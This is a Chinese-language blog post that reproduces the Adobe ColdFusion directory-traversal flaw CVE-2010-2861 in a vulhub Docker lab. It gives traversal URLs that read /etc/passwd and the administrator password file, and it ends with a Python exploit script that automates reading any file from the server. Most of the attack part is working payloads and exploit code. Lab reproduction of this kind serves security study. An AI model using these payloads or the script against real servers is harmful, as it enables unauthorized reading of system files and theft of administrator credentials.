vulhub

CVE-2010-2861

2019-07-25  本文已影响110人  3mi1e

Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)

1.漏洞影响版本

Adobe ColdFusion 9.0.1及更早版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

2.漏洞危害

任意文件读取

3.漏洞POC

执行如下命令启动Adobe CouldFusion 8.0.1版本服务器:

cd /root/vulhub/coldfusion/CVE-2010-2861/              ////进入本次复现的vulhub目录
docker-compose up -d                                   ////docker-compose搭建环境
启动服务器

访问http://192.168.11.135:8500/CFIDE/administrator/enter.cfm,可以看到初始化页面,输入密码admin,开始初始化整个环境。

初始化页面

一定要删掉COOKIE,不然会重定向到首页,访问URL:
http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

POC

读取管理员密码:
http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

图片.png
4.复盘

漏洞出现原因
目录的路径名的限制不当
附上python读取文件脚本
总结
1.第一次在本系列中写EXP,大佬们多多指导。
2.不积跬步无以至千里。
3.脚本照msf的肯定low一些,以后有机会写EXP我会一点点改进的。(文末有msf模块EXP)
4.又有些小窃喜,msf的脚本有问题哦!!!!不注意夸得目录级别不一样多,怎么扫出管理员密码。

#coding=utf-8
import re
import sys
import requests

def read_file(url,file):
    result = requests.get(url+file)
    print url+file
    print re.findall("(?<=\<title\>).+?(?=\<)", result.text,re.S)[0]

def main():
    print "Usage:python CVE-2010-2861.py IP:PORT file"
    if len(sys.argv) > 2:
        url = "http://" + sys.argv[1] + "/CFIDE/administrator/enter.cfm?locale="
        file = sys.argv[2]
        if "/lib/password.properties" == file:
            file = "../../../../../../.." + file + "%00en"
        else:
            file = "../../../../../../../../../.." + file + "%00en"
        read_file(url,file)
    else:
        print "[-] input Error,please retry."
main()
EXP
msf模块
bug
上一篇 下一篇

猜你喜欢

热点阅读